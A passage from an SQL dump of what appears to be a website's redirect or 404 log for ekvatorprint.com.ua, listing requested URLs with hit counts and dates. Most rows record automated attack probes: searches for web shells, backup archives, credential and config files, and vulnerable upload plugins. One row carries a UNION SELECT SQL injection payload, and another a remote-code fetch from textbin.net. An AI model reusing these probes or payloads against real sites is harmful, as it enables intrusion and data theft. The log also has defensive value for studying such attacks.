00:00:00',301),(24096,'https://ekvatorprint.com.ua/wp-option.php',NULL,'','',1,0,'2022-08-03 04:57:59','0000-00-00 00:00:00',301),(24097,'https://ekvatorprint.com.ua/wp-clearline.php',NULL,'','',1,0,'2022-08-03 04:57:59','0000-00-00 00:00:00',301),(24098,'https://ekvatorprint.com.ua/wp-blockup.php',NULL,'','',2,0,'2022-08-03 04:57:59','0000-00-00 00:00:00',301),(24099,'https://ekvatorprint.com.ua/un.php',NULL,'','',1,0,'2022-08-03 04:58:00','0000-00-00 00:00:00',301),(24100,'https://ekvatorprint.com.ua/blue.php',NULL,'','',1,0,'2022-08-03 04:58:00','0000-00-00 00:00:00',301),(24101,'https://ekvatorprint.com.ua/wp-blog-post.php',NULL,'','',2,0,'2022-08-03 04:58:01','0000-00-00 00:00:00',301),(24102,'https://ekvatorprint.com.ua/wp-craft-report.php',NULL,'','',1,0,'2022-08-03 04:58:01','0000-00-00 00:00:00',301),(24103,'https://ekvatorprint.com.ua/outcms.php',NULL,'','',1,0,'2022-08-03 04:58:02','0000-00-00 00:00:00',301),(24104,'https://ekvatorprint.com.ua/th3_alpha.php',NULL,'','',1,0,'2022-08-03 04:58:02','0000-00-00 00:00:00',301),(24105,'https://ekvatorprint.com.ua/upload_index.php',NULL,'','',1,0,'2022-08-03 04:58:03','0000-00-00 00:00:00',301),(24106,'https://ekvatorprint.com.ua/smtphec.php',NULL,'','',2,0,'2022-08-03 04:58:03','0000-00-00 00:00:00',301),(24107,'https://ekvatorprint.com.ua/wp-supports.php',NULL,'','',1,0,'2022-08-03 04:58:04','0000-00-00 00:00:00',301),(24108,'https://ekvatorprint.com.ua/votes.php',NULL,'','',2,0,'2022-08-03 04:58:04','0000-00-00 00:00:00',301),(24109,'https://ekvatorprint.com.ua/wp-blockdown.php',NULL,'','',2,0,'2022-08-03 04:58:05','0000-00-00 00:00:00',301),(24110,'https://ekvatorprint.com.ua/wpecho.php',NULL,'','',1,0,'2022-08-03 04:58:05','0000-00-00 00:00:00',301),(24111,'https://ekvatorprint.com.ua/d2.php',NULL,'','',1,0,'2022-08-03 04:58:05','0000-00-00 00:00:00',301),(24112,'https://ekvatorprint.com.ua/infodat.php',NULL,'','',1,0,'2022-08-03 04:58:05','0000-00-00 00:00:00',301),(24113,'https://ekvatorprint.com.ua/webdata.php',NULL,'','',1,0,'2022-08-03 04:58:06','0000-00-00 00:00:00',301),(24114,'https://ekvatorprint.com.ua/web.php',NULL,'','',1,0,'2022-08-03 04:58:06','0000-00-00 00:00:00',301),(24115,'https://ekvatorprint.com.ua/wp-coments.php',NULL,'','',2,0,'2022-08-04 03:48:29','0000-00-00 00:00:00',301),(24116,'https://ekvatorprint.com.ua/curvy.php',NULL,'','',1,0,'2022-08-06 21:55:12','0000-00-00 00:00:00',301),(24117,'https://ekvatorprint.com.ua/wp-content/plugins/sid/up.php',NULL,'','',1,0,'2022-08-06 21:56:28','0000-00-00 00:00:00',301),(24118,'https://ekvatorprint.com.ua/ty.php',NULL,'','',1,0,'2022-08-06 21:57:16','0000-00-00 00:00:00',301),(24119,'https://ekvatorprint.com.ua/haxo.php',NULL,'','',1,0,'2022-08-06 21:57:35','0000-00-00 00:00:00',301),(24120,'https://ekvatorprint.com.ua/wp-content/wpconfig.bak.php?act=ul',NULL,'','',1,0,'2022-08-06 21:58:05','0000-00-00 00:00:00',301),(24121,'https://ekvatorprint.com.ua/wp-content/plugins/wpconfig.bak.php?act=ul',NULL,'','',1,0,'2022-08-06 21:58:17','0000-00-00 00:00:00',301),(24122,'https://ekvatorprint.com.ua/wp-content/themes/wpconfig.bak.php?act=ul',NULL,'','',1,0,'2022-08-06 21:58:27','0000-00-00 00:00:00',301),(24123,'https://ekvatorprint.com.ua/nin.php',NULL,'','',2,0,'2022-08-07 18:46:22','0000-00-00 00:00:00',301),(24124,'https://ekvatorprint.com.ua/phpinfo.html',NULL,'','',1,0,'2022-08-08 07:03:10','0000-00-00 00:00:00',301),(24125,'https://ekvatorprint.com.ua/.aws.yml',NULL,'','',1,0,'2022-08-08 12:17:58','0000-00-00 00:00:00',301),(24126,'https://ekvatorprint.com.ua/wp-includes/js/jquery/jquery-migrate.min.js',NULL,'','',1,0,'2022-08-08 12:33:47','0000-00-00 00:00:00',301),(24127,'https://ekvatorprint.com.ua/wp-includes/id3/license.txt',NULL,'','',1,0,'2022-08-08 12:33:52','0000-00-00 00:00:00',301),(24128,'https://ekvatorprint.com.ua/admin/upload.php',NULL,'','',1,0,'2022-08-09 12:14:47','0000-00-00 00:00:00',301),(24129,'https://ekvatorprint.com.ua/wp-admin/admin-post.php',NULL,'www.google.com','',1,0,'2022-08-12 12:59:07','0000-00-00 00:00:00',301),(24130,'https://ekvatorprint.com.ua/wp-content/plugins/instabuilder2/cache/up.php',NULL,'www.google.com','',1,0,'2022-08-12 12:59:08','0000-00-00 00:00:00',301),(24131,'https://ekvatorprint.com.ua/wp-includes/customize/class-wp-customize-nav-menu.php?null=1',NULL,'','',2,0,'2022-08-12 18:18:04','0000-00-00 00:00:00',301),(24132,'https://ekvatorprint.com.ua/wp/wp-includes/customize/class-wp-customize-nav-menu.php?null=1',NULL,'','',1,0,'2022-08-12 18:18:04','0000-00-00 00:00:00',301),(24133,'https://ekvatorprint.com.ua/wordpress/wp-includes/customize/class-wp-customize-nav-menu.php?null=1',NULL,'','',1,0,'2022-08-12 18:18:05','0000-00-00 00:00:00',301),(24134,'https://ekvatorprint.com.ua/blog/wp-includes/customize/class-wp-customize-nav-menu.php?null=1',NULL,'','',1,0,'2022-08-12 18:18:06','0000-00-00 00:00:00',301),(24135,'https://ekvatorprint.com.ua/site/wp-includes/customize/class-wp-customize-nav-menu.php?null=1',NULL,'','',1,0,'2022-08-12 18:18:06','0000-00-00 00:00:00',301),(24136,'https://ekvatorprint.com.ua/wp-content/plugins/formcraft/file-upload/server/content/upload.php',NULL,'','',1,0,'2022-08-13 15:02:51','0000-00-00 00:00:00',301),(24137,'https://ekvatorprint.com.ua/qawtsoqa.php?fox=d3wl7',NULL,'www.google.com','',1,0,'2022-08-13 20:50:32','0000-00-00 00:00:00',301),(24138,'https://ekvatorprint.com.ua/wp-content/plugins/formcraft/file-upload/server/php/index.php?file=tf2rghf.jpg',NULL,'','',1,0,'2022-08-15 04:10:37','0000-00-00 00:00:00',301),(24139,'https://ekvatorprint.com.ua/wp-content/radio.php',NULL,'','',1,0,'2022-08-16 08:00:40','0000-00-00 00:00:00',301),(24140,'https://ekvatorprint.com.ua/plugins/filemanager/php/connector.minimal.php',NULL,'','',1,0,'2022-08-16 15:08:08','0000-00-00 00:00:00',301),(24141,'https://ekvatorprint.com.ua/wp-content/plugins/instabuilder2/assets/css/instabuilder2.css',NULL,'www.google.com','',2,0,'2022-08-16 19:50:31','0000-00-00 00:00:00',301),(24142,'https://ekvatorprint.com.ua/wp/wp-content/plugins/instabuilder2/assets/css/instabuilder2.css',NULL,'www.google.com','',2,0,'2022-08-16 19:50:53','0000-00-00 00:00:00',301),(24143,'https://ekvatorprint.com.ua/wordpress/wp-content/plugins/instabuilder2/assets/css/instabuilder2.css',NULL,'www.google.com','',2,0,'2022-08-16 19:51:19','0000-00-00 00:00:00',301),(24144,'https://ekvatorprint.com.ua/blog/wp-content/plugins/instabuilder2/assets/css/instabuilder2.css',NULL,'www.google.com','',2,0,'2022-08-16 19:51:43','0000-00-00 00:00:00',301),(24145,'https://ekvatorprint.com.ua/upload/server/php-directory/index.php?file=tf2rghf.jpg',NULL,'','',1,0,'2022-08-17 07:49:00','0000-00-00 00:00:00',301),(24146,'https://ekvatorprint.com.ua/phpinf.php',NULL,'','',1,0,'2022-08-17 07:53:00','0000-00-00 00:00:00',301),(24147,'https://ekvatorprint.com.ua/sy48qepaqcn5teqkberw',NULL,'','',1,0,'2022-08-18 03:47:18','0000-00-00 00:00:00',301),(24148,'https://ekvatorprint.com.ua/upload/server/php-files/index.php?file=tf2rghf.jpg',NULL,'','',1,0,'2022-08-18 16:12:59','0000-00-00 00:00:00',301),(24149,'https://ekvatorprint.com.ua/wp-content/plugins/simple-ads-manager/css/jslider.round.plastic.css',NULL,'','',1,0,'2022-08-20 03:48:26','0000-00-00 00:00:00',301),(24150,'https://ekvatorprint.com.ua/admin/assets/file-uploader/server/php/index.php?file=tf2rghf.jpg',NULL,'','',1,0,'2022-08-21 13:58:55','0000-00-00 00:00:00',301),(24151,'https://ekvatorprint.com.ua/components/com_tags/views/tag/tmpl/framework.php',NULL,'','',1,0,'2022-08-22 17:00:09','0000-00-00 00:00:00',301),(24152,'https://ekvatorprint.com.ua/media-admin.phpups.php',NULL,'','',1,0,'2022-08-22 18:36:13','0000-00-00 00:00:00',301),(24153,'https://ekvatorprint.com.ua/sites/default/files/ups.phpups.php',NULL,'','',1,0,'2022-08-23 08:58:04','0000-00-00 00:00:00',301),(24154,'https://ekvatorprint.com.ua/cache/ups.phpups.php',NULL,'','',1,0,'2022-08-23 10:51:44','0000-00-00 00:00:00',301),(24155,'https://ekvatorprint.com.ua/modules/mod_ariimageslidersa/get.php?key=sdfadsgh4513sdgg435341fdgwwdfgdfhdfgdsfgdfsgdfg',NULL,'','',1,0,'2022-08-23 16:31:08','0000-00-00 00:00:00',301),(24156,'https://ekvatorprint.com.ua/xltavrat.php',NULL,'','',7,0,'2022-08-23 16:35:17','0000-00-00 00:00:00',301),(24157,'https://ekvatorprint.com.ua/providers/htmleditorproviders/telerik/telerik.web.ui.dialoghandler.aspx',NULL,'','',2,0,'2022-08-23 20:31:03','0000-00-00 00:00:00',301),(24158,'https://ekvatorprint.com.ua/desktopmodules/telerikwebui/radeditorprovider/telerik.web.ui.dialoghandler.aspx',NULL,'','',1,0,'2022-08-23 20:31:59','0000-00-00 00:00:00',301),(24159,'https://ekvatorprint.com.ua/desktopmodules/dnnwerk.radeditorprovider/dialoghandler.aspx',NULL,'','',1,0,'2022-08-23 20:32:21','0000-00-00 00:00:00',301),(24160,'https://ekvatorprint.com.ua/components/general/admin/usercontrol/telerik.web.ui.dialoghandler.aspx',NULL,'','',1,0,'2022-08-23 20:32:55','0000-00-00 00:00:00',301),(24161,'https://ekvatorprint.com.ua/.index.env',NULL,'','',1,0,'2022-08-24 22:13:34','0000-00-00 00:00:00',301),(24162,'https://ekvatorprint.com.ua/credentials.php',NULL,'','',1,0,'2022-08-25 01:25:22','0000-00-00 00:00:00',301),(24163,'https://ekvatorprint.com.ua/assets/file-uploader/server/php/index.php?file=tf2rghf.jpg',NULL,'','',1,0,'2022-08-25 15:58:28','0000-00-00 00:00:00',301),(24164,'https://ekvatorprint.com.ua/products.json',NULL,'','',1,0,'2022-08-26 19:09:30','0000-00-00 00:00:00',301),(24165,'https://ekvatorprint.com.ua/file-uploader/server/php/index.php?file=tf2rghf.jpg',NULL,'','',1,0,'2022-08-27 01:49:02','0000-00-00 00:00:00',301),(24166,'https://ekvatorprint.com.ua/public/assets/file-uploader/server/php/index.php?file=tf2rghf.jpg',NULL,'','',1,0,'2022-08-28 10:19:02','0000-00-00 00:00:00',301),(24167,'https://ekvatorprint.com.ua/s/3138352e31332e352e3535/_/;/meta-inf/maven/com.atlassian.jira/jira-webapp-dist/pom.properties',NULL,'','',1,0,'2022-08-29 07:10:36','0000-00-00 00:00:00',301),(24168,'https://ekvatorprint.com.ua/ecp/current/exporttool/microsoft.exchange.ediscovery.exporttool.application',NULL,'','',1,0,'2022-08-29 07:10:37','0000-00-00 00:00:00',301),(24169,'https://ekvatorprint.com.ua/wp-content/uploads/2022/03/fast-logo.jpg',NULL,'','',2,0,'2022-08-29 07:14:11','0000-00-00 00:00:00',301),(24170,'https://ekvatorprint.com.ua/assets/js/file-uploader/server/php/index.php?file=tf2rghf.jpg',NULL,'','',1,0,'2022-08-30 03:52:52','0000-00-00 00:00:00',301),(24171,'https://ekvatorprint.com.ua/assets/plugins/file-uploader/server/php/index.php?file=tf2rghf.jpg',NULL,'','',1,0,'2022-08-31 15:03:13','0000-00-00 00:00:00',301),(24172,'https://ekvatorprint.com.ua/includes/js/joomla.javascript.js',NULL,'','',1,0,'2022-09-01 03:20:40','0000-00-00 00:00:00',301),(24173,'https://ekvatorprint.com.ua/templates/css/offline.css',NULL,'','',1,0,'2022-09-01 03:20:40','0000-00-00 00:00:00',301),(24174,'https://ekvatorprint.com.ua/.credentials.php',NULL,'','',1,0,'2022-09-01 22:19:49','0000-00-00 00:00:00',301),(24175,'https://ekvatorprint.com.ua/plugins/file-uploader/server/php/index.php?file=tf2rghf.jpg',NULL,'','',1,0,'2022-09-02 02:59:24','0000-00-00 00:00:00',301),(24176,'https://ekvatorprint.com.ua/.aws/.credentials.php',NULL,'','',1,0,'2022-09-02 15:28:18','0000-00-00 00:00:00',301),(24177,'https://ekvatorprint.com.ua/pl1s8ky2hfml',NULL,'','',1,0,'2022-09-03 02:10:00','0000-00-00 00:00:00',301),(24178,'https://ekvatorprint.com.ua/wp-config.bak.php',NULL,'','',1,0,'2022-09-04 03:17:14','0000-00-00 00:00:00',301),(24179,'https://ekvatorprint.com.ua/configuration.php.bck',NULL,'','',1,0,'2022-09-04 04:39:18','0000-00-00 00:00:00',301),(24180,'https://ekvatorprint.com.ua/sql.txt',NULL,'','',1,0,'2022-09-04 07:00:22','0000-00-00 00:00:00',301),(24181,'https://ekvatorprint.com.ua/bck.sql',NULL,'','',1,0,'2022-09-04 11:43:37','0000-00-00 00:00:00',301),(24182,'https://ekvatorprint.com.ua/wp-content/plugins/super-interactive-maps/sim-wp-admin/pages/manage-maps.php',NULL,'','',1,0,'2022-09-05 03:16:01','0000-00-00 00:00:00',301),(24183,'https://ekvatorprint.com.ua/ekvatorprint.com.ua.bck.sql',NULL,'','',2,0,'2022-09-05 08:55:23','0000-00-00 00:00:00',301),(24184,'https://ekvatorprint.com.ua/backup.bkp',NULL,'','',3,0,'2022-09-05 18:22:34','0000-00-00 00:00:00',301),(24185,'https://ekvatorprint.com.ua/backup.bkup',NULL,'','',4,0,'2022-09-05 18:27:22','0000-00-00 00:00:00',301),(24186,'https://ekvatorprint.com.ua/backup.psc',NULL,'','',4,0,'2022-09-05 18:43:17','0000-00-00 00:00:00',301),(24187,'https://ekvatorprint.com.ua/backup.npb',NULL,'','',4,0,'2022-09-05 19:02:41','0000-00-00 00:00:00',301),(24188,'https://ekvatorprint.com.ua/plugins/filemanager/dialog.php',NULL,'','',1,0,'2022-09-05 19:03:01','0000-00-00 00:00:00',301),(24189,'https://ekvatorprint.com.ua/backup.ibz',NULL,'','',4,0,'2022-09-05 19:22:32','0000-00-00 00:00:00',301),(24190,'https://ekvatorprint.com.ua/backup.backup',NULL,'','',4,0,'2022-09-05 19:53:15','0000-00-00 00:00:00',301),(24191,'https://ekvatorprint.com.ua/backup/backup.bz2',NULL,'','',4,0,'2022-09-05 20:04:02','0000-00-00 00:00:00',301),(24192,'https://ekvatorprint.com.ua/backup/backup.gz',NULL,'','',4,0,'2022-09-05 20:20:40','0000-00-00 00:00:00',301),(24193,'https://ekvatorprint.com.ua/backup/backup.rar',NULL,'','',3,0,'2022-09-05 21:12:03','0000-00-00 00:00:00',301),(24194,'https://ekvatorprint.com.ua/backup/backup.tar',NULL,'','',3,0,'2022-09-05 21:24:00','0000-00-00 00:00:00',301),(24195,'https://ekvatorprint.com.ua/backup/backup.tar.gz',NULL,'','',4,0,'2022-09-05 21:32:20','0000-00-00 00:00:00',301),(24196,'https://ekvatorprint.com.ua/backup/backup.tgz',NULL,'','',4,0,'2022-09-05 21:53:56','0000-00-00 00:00:00',301),(24197,'https://ekvatorprint.com.ua/backup/backup.zip',NULL,'','',3,0,'2022-09-05 22:20:25','0000-00-00 00:00:00',301),(24198,'https://ekvatorprint.com.ua/dump.bck',NULL,'','',3,0,'2022-09-05 22:58:06','0000-00-00 00:00:00',301),(24199,'https://ekvatorprint.com.ua/dump.sql.tgz',NULL,'','',3,0,'2022-09-06 00:21:09','0000-00-00 00:00:00',301),(24200,'https://ekvatorprint.com.ua/dump.sql.bck',NULL,'','',3,0,'2022-09-06 00:53:29','0000-00-00 00:00:00',301),(24201,'https://ekvatorprint.com.ua/dump.tgz',NULL,'','',4,0,'2022-09-06 01:05:04','0000-00-00 00:00:00',301),(24202,'https://ekvatorprint.com.ua/wp-includes/customize/class-wp-customize-nav-menu.php?new',NULL,'','',1,0,'2022-09-06 01:43:29','0000-00-00 00:00:00',301),(24203,'https://ekvatorprint.com.ua/wp-content/themes/un.php?php=https://textbin.net/raw/k9bbqot3ml',NULL,'','',1,0,'2022-09-06 01:44:18','0000-00-00 00:00:00',301),(24204,'https://ekvatorprint.com.ua/home.bck',NULL,'','',4,0,'2022-09-06 04:48:43','0000-00-00 00:00:00',301),(24205,'https://ekvatorprint.com.ua/htodcs.rar',NULL,'','',3,0,'2022-09-06 06:40:12','0000-00-00 00:00:00',301),(24206,'https://ekvatorprint.com.ua/htodcs.bck',NULL,'','',2,0,'2022-09-06 08:47:00','0000-00-00 00:00:00',301),(24207,'https://ekvatorprint.com.ua/public_html.rar',NULL,'','',2,0,'2022-09-06 09:02:56','0000-00-00 00:00:00',301),(24208,'https://ekvatorprint.com.ua/plugins/editors/jckeditor/plugins/jtreelink/dialogs/links.php?extension=menu&view=menu&parent=\" union select null,null,concat_ws(0x203a20,user(),database(),version(),0x6e75636c65692d74656d706c617465),null,null,null,null,null-- aa',NULL,'https://ekvatorprint.com.ua','',1,0,'2022-09-06 09:14:19','0000-00-00 00:00:00',301),(24209,'https://ekvatorprint.com.ua/public_html.bck',NULL,'','',2,0,'2022-09-06 10:42:26','0000-00-00 00:00:00',301),(24210,'https://ekvatorprint.com.ua/e@ekvatorprint.com.ua',NULL,'','',1,0,'2022-09-06 12:53:59','0000-00-00 00:00:00',301),(24211,'https://ekvatorprint.com.ua/site.bck',NULL,'','',2,0,'2022-09-06 14:49:48','0000-00-00 00:00:00',301),(24212,'https://ekvatorprint.com.ua/upload.rar',NULL,'','',2,0,'2022-09-06 14:58:32','0000-00-00 00:00:00',301),(24213,'https://ekvatorprint.com.ua/web.rar',NULL,'','',3,0,'2022-09-06 15:45:03','0000-00-00 00:00:00',301),(24214,'https://ekvatorprint.com.ua/web.tar',NULL,'','',2,0,'2022-09-06 16:18:41','0000-00-00 00:00:00',301),(24215,'https://ekvatorprint.com.ua/web.tar.gz',NULL,'','',2,0,'2022-09-06 16:35:39','0000-00-00 00:00:00',301),(24216,'https://ekvatorprint.com.ua/web.zip',NULL,'','',2,0,'2022-09-06 17:02:15','0000-00-00 00:00:00',301),(24217,'https://ekvatorprint.com.ua/mohzmlod.php?fox=d3wl7',NULL,'www.google.com','',1,0,'2022-09-06 17:50:58','0000-00-00 00:00:00',301),(24218,'https://ekvatorprint.com.ua/web.bck',NULL,'','',2,0,'2022-09-06 18:45:04','0000-00-00 00:00:00',301),(24219,'https://ekvatorprint.com.ua/www.tar.bz2',NULL,'','',2,0,'2022-09-06 21:33:50','0000-00-00 00:00:00',301),(24220,'https://ekvatorprint.com.ua/www.bck',NULL,'','',3,0,'2022-09-06 23:08:12','0000-00-00 00:00:00',301),(24221,'https://ekvatorprint.com.ua/www.ekvatorprint.com.ua.gz',NULL,'','',3,0,'2022-09-06 23:37:39','0000-00-00 00:00:00',301),(24222,'https://ekvatorprint.com.ua/www.ekvatorprint.com.ua.rar',NULL,'','',3,0,'2022-09-07 00:16:33','0000-00-00 00:00:00',301),(24223,'https://ekvatorprint.com.ua/www.ekvatorprint.com.ua.sql',NULL,'','',3,0,'2022-09-07 00:39:35','0000-00-00 00:00:00',301),(24224,'https://ekvatorprint.com.ua/www.ekvatorprint.com.ua.sql.gz',NULL,'','',3,0,'2022-09-07 02:09:41','0000-00-00 00:00:00',301),(24225,'https://ekvatorprint.com.ua/www.ekvatorprint.com.ua.tar',NULL,'','',3,0,'2022-09-07 02:38:09','0000-00-00 00:00:00',301),(24226,'https://ekvatorprint.com.ua/www.ekvatorprint.com.ua.tar.gz',NULL,'','',3,0,'2022-09-07 02:53:48','0000-00-00 00:00:00',301),(24227,'https://ekvatorprint.com.ua/www.ekvatorprint.com.ua.tgz',NULL,'','',3,0,'2022-09-07 04:03:07','0000-00-00 00:00:00',301),(24228,'https://ekvatorprint.com.ua/www.ekvatorprint.com.ua.zip',NULL,'','',3,0,'2022-09-07 04:22:47','0000-00-00 00:00:00',301),(24229,'https://ekvatorprint.com.ua/www.ekvatorprint.com.ua.7z',NULL,'','',3,0,'2022-09-07 04:48:28','0000-00-00 00:00:00',301),(24230,'https://ekvatorprint.com.ua/www.ekvatorprint.com.ua.bck',NULL,'','',4,0,'2022-09-07 05:08:57','0000-00-00 00:00:00',301),(24231,'https://ekvatorprint.com.ua/www.ekvatorprint.gz',NULL,'','',4,0,'2022-09-07 05:27:48','0000-00-00 00:00:00',301),(24232,'https://ekvatorprint.com.ua/www.ekvatorprint.rar',NULL,'','',4,0,'2022-09-07 05:55:13','0000-00-00 00:00:00',301),(24233,'https://ekvatorprint.com.ua/www.ekvatorprint.sql',NULL,'','',4,0,'2022-09-07 06:35:22','0000-00-00 00:00:00',301),(24234,'https://ekvatorprint.com.ua/www.ekvatorprint.sql.gz',NULL,'','',4,0,'2022-09-07 06:50:42','0000-00-00 00:00:00',301),(24235,'https://ekvatorprint.com.ua/www.ekvatorprint.tar',NULL,'','',4,0,'2022-09-07 07:05:34','0000-00-00 00:00:00',301),(24236,'https://ekvatorprint.com.ua/www.ekvatorprint.tar.gz',NULL,'','',4,0,'2022-09-07 07:54:10','0000-00-00 00:00:00',301),(24237,'https://ekvatorprint.com.ua/www.ekvatorprint.tgz',NULL,'','',3,0,'2022-09-07 09:22:34','0000-00-00 00:00:00',301),(24238,'https://ekvatorprint.com.ua/www.ekvatorprint.zip',NULL,'','',3,0,'2022-09-07 09:42:32','0000-00-00 00:00:00',301),(24239,'https://ekvatorprint.com.ua/www.ekvatorprint.7z',NULL,'','',3,0,'2022-09-07 10:08:51','0000-00-00 00:00:00',301),(24240,'https://ekvatorprint.com.ua/www.ekvatorprint.bck',NULL,'','',3,0,'2022-09-07 10:47:19','0000-00-00 00:00:00',301),(24241,'https://ekvatorprint.com.ua/ekvatorprint.com.ua.bck',NULL,'','',2,0,'2022-09-07 14:39:33','0000-00-00 00:00:00',301),(24242,'https://ekvatorprint.com.ua/ekvatorprint_backup.gz',NULL,'','',3,0,'2022-09-07 17:32:58','0000-00-00 00:00:00',301),(24243,'https://ekvatorprint.com.ua/ekvatorprint_backup.tgz',NULL,'','',3,0,'2022-09-07 21:15:57','0000-00-00 00:00:00',301),(24244,'https://ekvatorprint.com.ua/ekvatorprint_backup.bck',NULL,'','',3,0,'2022-09-07 21:29:11','0000-00-00 00:00:00',301),(24245,'https://ekvatorprint.com.ua/localhost-ekvatorprint-data.7z',NULL,'','',3,0,'2022-09-07 21:57:15','0000-00-00 00:00:00',301),(24246,'https://ekvatorprint.com.ua/localhost-ekvatorprint-data.bck',NULL,'','',3,0,'2022-09-07 22:20:46','0000-00-00 00:00:00',301),(24247,'https://ekvatorprint.com.ua/localhost-ekvatorprint.com.ua-data.7z',NULL,'','',3,0,'2022-09-07 22:40:45','0000-00-00 00:00:00',301),(24248,'https://ekvatorprint.com.ua/localhost-ekvatorprint.com.ua-data.bck',NULL,'','',3,0,'2022-09-07 22:52:35','0000-00-00 00:00:00',301),(24249,'https://ekvatorprint.com.ua/ekvatorprint.com.ua_mysql.sql',NULL,'','',3,0,'2022-09-07 23:05:43','0000-00-00 00:00:00',301),(24250,'https://ekvatorprint.com.ua/ekvatorprint_mysql.sql',NULL,'','',3,0,'2022-09-08 00:09:03','0000-00-00 00:00:00',301),(24251,'https://ekvatorprint.com.ua/databases.sql',NULL,'','',3,0,'2022-09-08 00:30:27','0000-00-00 00:00:00',301),(24252,'https://ekvatorprint.com.ua/databases.zip',NULL,'','',3,0,'2022-09-08 01:21:28','0000-00-00 00:00:00',301),(24253,'https://ekvatorprint.com.ua/databases.tar',NULL,'','',3,0,'2022-09-08 01:50:13','0000-00-00 00:00:00',301),(24254,'https://ekvatorprint.com.ua/databases.tar.gz',NULL,'','',4,0,'2022-09-08 02:01:51','0000-00-00 00:00:00',301),(24255,'https://ekvatorprint.com.ua/databases.tgz',NULL,'','',4,0,'2022-09-08 03:08:44','0000-00-00 00:00:00',301),(24256,'https://ekvatorprint.com.ua/databases.bck',NULL,'','',4,0,'2022-09-08 03:18:39','0000-00-00 00:00:00',301),(24257,'https://ekvatorprint.com.ua/config.php~',NULL,'','',3,0,'2022-09-08 03:36:59','0000-00-00 00:00:00',301),(24258,'https://ekvatorprint.com.ua/config.php.bak',NULL,'','',3,0,'2022-09-08 04:51:54','0000-00-00 00:00:00',301),(24259,'https://ekvatorprint.com.ua/config.php.bck',NULL,'','',3,0,'2022-09-08 05:22:47','0000-00-00 00:00:00',301),(24260,'https://ekvatorprint.com.ua/config.bak',NULL,'','',3,0,'2022-09-08 05:40:52','0000-00-00 00:00:00',301),(24261,'https://ekvatorprint.com.ua/connect.php.bak',NULL,'','',3,0,'2022-09-08 06:33:12','0000-00-00 00:00:00',301),(24262,'https://ekvatorprint.com.ua/connect.bck',NULL,'','',3,0,'2022-09-08 06:53:43','0000-00-00 00:00:00',301),(24263,'https://ekvatorprint.com.ua/connect.bak',NULL,'','',3,0,'2022-09-08 07:18:31','0000-00-00 00:00:00',301),(24264,'https://ekvatorprint.com.ua/connect.php~',NULL,'','',3,0,'2022-09-08 09:03:09','0000-00-00 00:00:00',301),(24265,'https://ekvatorprint.com.ua/db.php~',NULL,'','',3,0,'2022-09-08 09:28:38','0000-00-00 00:00:00',301),(24266,'https://ekvatorprint.com.ua/db.php.bck',NULL,'','',4,0,'2022-09-08 11:26:28','0000-00-00 00:00:00',301),(24267,'https://ekvatorprint.com.ua/wp-content/plugins/superstorefinder-wp/css/ssf-wp-pop.css',NULL,'','',1,0,'2022-09-08 11:51:03','0000-00-00 00:00:00',301),(24268,'https://ekvatorprint.com.ua/db.php.bak',NULL,'','',4,0,'2022-09-08 11:56:25','0000-00-00 00:00:00',301),(24269,'https://ekvatorprint.com.ua/database.php~',NULL,'','',4,0,'2022-09-08 12:04:03','0000-00-00 00:00:00',301),(24270,'https://ekvatorprint.com.ua/database.php.bak',NULL,'','',3,0,'2022-09-08 12:55:53','0000-00-00 00:00:00',301),(24271,'https://ekvatorprint.com.ua/database.php.bck',NULL,'','',3,0,'2022-09-08 13:23:07','0000-00-00 00:00:00',301),(24272,'https://ekvatorprint.com.ua/inc/config.php~',NULL,'','',3,0,'2022-09-08 13:56:24','0000-00-00 00:00:00',301),(24273,'https://ekvatorprint.com.ua/inc/config.bak',NULL,'','',3,0,'2022-09-08 14:21:31','0000-00-00 00:00:00',301),(24274,'https://ekvatorprint.com.ua/inc/config.bck',NULL,'','',2,0,'2022-09-08 15:04:54','0000-00-00 00:00:00',301),(24275,'https://ekvatorprint.com.ua/inc/config.php.bak',NULL,'','',3,0,'2022-09-08 15:16:47','0000-00-00 00:00:00',301),(24276,'https://ekvatorprint.com.ua/alfa_data/alfacgiapi/fox.php',NULL,'','',1,0,'2022-09-08 15:28:57','0000-00-00 00:00:00',301),(24277,'https://ekvatorprint.com.ua/inc/config.php.bck',NULL,'','',2,0,'2022-09-08 16:14:34','0000-00-00 00:00:00',301),(24278,'https://ekvatorprint.com.ua/inc/db.php~',NULL,'','',2,0,'2022-09-08 16:44:14','0000-00-00 00:00:00',301),(24279,'https://ekvatorprint.com.ua/inc/db.bck',NULL,'','',2,0,'2022-09-08 17:25:50','0000-00-00 00:00:00',301),(24280,'https://ekvatorprint.com.ua/inc/db.bak',NULL,'','',2,0,'2022-09-08 18:39:53','0000-00-00 00:00:00',301),(24281,'https://ekvatorprint.com.ua/inc/db.php.bak',NULL,'','',2,0,'2022-09-08 18:48:50','0000-00-00 00:00:00',301),(24282,'https://ekvatorprint.com.ua/inc/db.php.bck',NULL,'','',1,0,'2022-09-08 19:02:54','0000-00-00 00:00:00',301),(24283,'https://ekvatorprint.com.ua/inc/database.php~',NULL,'','',2,0,'2022-09-08 19:17:37','0000-00-00 00:00:00',301),(24284,'https://ekvatorprint.com.ua/inc/database.bak',NULL,'','',1,0,'2022-09-08 20:38:23','0000-00-00 00:00:00',301),(24285,'https://ekvatorprint.com.ua/inc/database.php.bak',NULL,'','',2,0,'2022-09-08 21:11:54','0000-00-00 00:00:00',301),(24286,'https://ekvatorprint.com.ua/inc/database.php.bck',NULL,'','',2,0,'2022-09-08 21:24:42','0000-00-00 00:00:00',301),(24287,'https://ekvatorprint.com.ua/inc/connect.php~',NULL,'','',3,0,'2022-09-08 21:46:34','0000-00-00 00:00:00',301),(24288,'https://ekvatorprint.com.ua/inc/connect.bak',NULL,'','',3,0,'2022-09-08 21:55:05','0000-00-00 00:00:00',301),(24289,'https://ekvatorprint.com.ua/inc/connect.bck',NULL,'','',4,0,'2022-09-08 22:12:04','0000-00-00 00:00:00',301),(24290,'https://ekvatorprint.com.ua/inc/connect.php.bak',NULL,'','',4,0,'2022-09-08 22:26:35','0000-00-00 00:00:00',301),(24291,'https://ekvatorprint.com.ua/inc/connect.php.bck',NULL,'','',3,0,'2022-09-08 22:41:35','0000-00-00 00:00:00',301),(24292,'https://ekvatorprint.com.ua/inc/database.bck',NULL,'','',1,0,'2022-09-08 22:42:43','0000-00-00 00:00:00',301),(24293,'https://ekvatorprint.com.ua/includes/db.php~',NULL,'','',2,0,'2022-09-09 01:17:04','0000-00-00 00:00:00',301),(24294,'https://ekvatorprint.com.ua/includes/db.bak',NULL,'','',2,0,'2022-09-09 01:36:53','0000-00-00 00:00:00',301),(24295,'https://ekvatorprint.com.ua/includes/db.bck',NULL,'','',2,0,'2022-09-09 